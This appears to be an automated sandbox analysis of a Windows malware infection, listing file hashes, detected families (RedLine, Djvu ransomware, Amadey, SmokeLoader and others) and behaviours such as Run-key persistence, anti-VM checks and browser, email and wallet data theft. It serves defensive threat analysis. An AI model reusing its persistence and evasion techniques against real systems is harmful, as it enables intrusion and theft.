SHA256 7409375ac9c5e32b1d27fba7d6f93ee7dcaaa7848e1b96de944b97bff42b4497
SHA512 8b93f2a41250504b791fc379e524952c7013479404fb02dc7f065443e48aa40079ea3215c0b1ddb8dcab55d902ed97be378694cbbb5911df0d6776973c1dfd61

memory/2824-1007-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3364-1013-0x0000000000270000-0x0000000000370000-memory.dmp

memory/3364-1014-0x00000000001B0000-0x00000000001B9000-memory.dmp

memory/3256-1032-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/3256-1033-0x00000000026B0000-0x0000000002730000-memory.dmp

memory/3256-1034-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/3364-1035-0x0000000000270000-0x0000000000370000-memory.dmp

memory/3256-1036-0x00000000026B0000-0x0000000002730000-memory.dmp

memory/3484-1040-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3484-1041-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3484-1049-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3256-1050-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/3256-1054-0x00000000026B0000-0x0000000002730000-memory.dmp

memory/3256-1066-0x00000000026B0000-0x0000000002730000-memory.dmp

memory/3256-1072-0x000000001B190000-0x000000001B472000-memory.dmp

memory/3256-1073-0x00000000026B0000-0x0000000002730000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\cefbf126-4503-4d99-8523-7cffeaaada6b.tmp

MD5 fd74eec26d6d0c5c637f7e6b6b2ee0a6
SHA1 9b14ccd828ca358c0625cc979b72980a8758c464
SHA256 5265f76fc5d57bd0480c812056baa81b5f213b1795d5310587ab1fd3fb317cbc
SHA512 3e2332bb41238ba184a2a4844b7e7fc31ff88ca981e57d5adc6c1fe1b2de26237ff926f969e7053ef776c98aaf2a2e308456d1aef473eb4ff16e5eeffb874250

C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe

MD5 fa0f9adea2e58ed44c52716416964850
SHA1 07d4df5af7cc0c1e43d8b4a88798f2f5f84e8b31
SHA256 df75b62e373e0b91f26384b21aaa8e4dc86c13078cec7e32ad595d0c86d3fedb
SHA512 63f476c5e212d67eefe8723c21a65a7c5ccaea543cb8901410c6ed1378a7b0d8e0a130dab08d59ecc09dc3feac4282aebdf645d2f9cfd330224f2f161dad4185

memory/2120-1145-0x0000000000400000-0x000000000062D000-memory.dmp

memory/2120-1144-0x00000000006C0000-0x00000000007C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000358001\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/3256-1167-0x0000000002690000-0x0000000002698000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Temp\9C7F.exe

MD5 7540f187f5efc718643cab72d2da8093
SHA1 22d4288ef20f68b779c70642ec7c43a321fb0cf1
SHA256 1b69b5f289ec0b437496810e9d1e2fd480adf33385ce619836bbfe96ed224640
SHA512 33ae7d34e0183aa9183b5f41263af9b1758c94decdd9affccc0894c4cbfc09b8038f11af7066f738c21b30bba5561a60ecd63fb4f6f974924cf915ce8abcee97

C:\Users\Admin\AppData\Local\Temp\AF83.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Program Files\Google\Chrome\updater.exe

MD5 93a83c35a0febf8376a76d36f8f3e1c1
SHA1 c112ccfcfe63a72595cba83d9c4f815c5f4b36a4
SHA256 3fb9b791cb2d5ae79b9332be3b78048c98e957c0804b1f28cdd6f3d0e222f7cc
SHA512 428a8e3acb890749e3fe81f3e6ba320f55483bb85ec25d6d1f3ddd83bf66e3b6c825f3eac62923350b6db1b94de352564a423dd8a33ea6b7d75b3fbc7ed84f11

C:\Users\Admin\AppData\Local\Temp\BEFF.exe

MD5 41582701647982c3b7db18a65f875375
SHA1 46290694a6dae5e01f1214bf21d3273c5f436d36
SHA256 4e8272b74ba2f992a78e7b2958a66ac5d5c19b56c0822307c6c5d8a5f1b28126
SHA512 d3ff9d6e9adf8e52220930a8bd5b7e447dac5d4ec15bfeaf27fc203a54a7c513bed1f69cadcc3dcce20e8d9f1a9e7f426ea6cce1e2d7e85d2a4e998b999de672

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-17 06:58

Reported

2023-10-17 07:23

Platform

win10v2004-20230915-en

Max time kernel

514s

Max time network

597s

Command Line

C:\Windows\system32\lsass.exe

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Finds standalone samples of Amadey based on characteristic strings

amadey_qbo
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A

Renames multiple (169) files with added filename extension

ransomware

Downloads MZ/PE file

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\R6H5DbUMUEorruAu4jSA9yKu.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe N/A
N/A N/A C:\Windows\System32\smss.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
N/A N/A C:\Windows\System32\smss.exe N/A
N/A N/A C:\Windows\System32\smss.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
N/A N/A C:\Windows\System32\smss.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
N/A N/A C:\Windows\System32\smss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
N/A N/A C:\Windows\System32\smss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\orm6k3UPjyk7pHiE6lmOcRAp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Windows\System32\smss.exe N/A
N/A N/A C:\Windows\System32\smss.exe N/A
N/A N/A C:\Windows\System32\smss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5D01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Windows\System32\smss.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\\xXyQiNG_qhmki3RUDDNIRPh8.exe\" --AutoStart" C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy N/A N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini N/A N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol N/A N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI N/A N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe N/A N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe N/A
File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
N/A N/A C:\Windows\system32\sihost.exe N/A
N/A N/A C:\Windows\system32\sihost.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\sihost.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\smss.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\smss.exe N/A
